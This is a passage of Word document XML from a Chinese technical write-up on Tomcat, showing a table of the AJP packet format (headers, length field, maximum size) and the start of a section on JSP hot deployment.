                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E3D14">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1140" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="58" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="58" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="008232D6">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E3D14">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="58" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="58" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="008232D6">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E3D14">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>4…(n+3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidTr="008232D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="58" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="58" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="008232D6">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E3D14">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Server-&gt;Container</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1035" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="58" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="58" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="008232D6">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E3D14">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>0x12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1140" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="58" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="58" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="008232D6">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E3D14">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>0x34</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="58" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="58" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="008232D6">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E3D14">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>数据长度(n)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="58" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="58" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="008232D6">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E3D14">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>数据(payload)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidTr="008232D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="58" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="58" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="008232D6">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E3D14">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Container-&gt;Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1035" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="58" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="58" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="008232D6">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E3D14">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1140" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="58" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="58" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="008232D6">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E3D14">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="58" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="58" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="008232D6">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E3D14">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>数据长度(n)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="58" w:type="dxa"/>
              <w:left w:w="115" w:type="dxa"/>
              <w:bottom w:w="58" w:type="dxa"/>
              <w:right w:w="115" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="008232D6">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E3D14">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="2C2C2C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>数据(payload)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>                      </w:t>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>图表1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>可以看出，从apache发向tomcat包都带有0x1234头，而从tomcat发向apache的包都带有AB(ascii码)头，随后二字节代表数据的长度（不包括前四个字节）.所认AJP包的最大长度可以接近2^16，但目前的版本支持的最大包长度为2^13，即8K。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="008E3D14" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3D14">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2C2C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002972A1" w:rsidRPr="00EE184C" w:rsidRDefault="002972A1" w:rsidP="00133BE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C61D4F" w:rsidRPr="00F41A4C" w:rsidRDefault="00C61D4F" w:rsidP="00C61D4F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6.9  tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>热部署</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A960A2" w:rsidRPr="00F41A4C" w:rsidRDefault="00A960A2" w:rsidP="002048BF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="279" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>我们知道在开发工程的时候</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>文件是即修改即生效的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>，由于比较好奇就研究了一下</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>jsp</w:t>
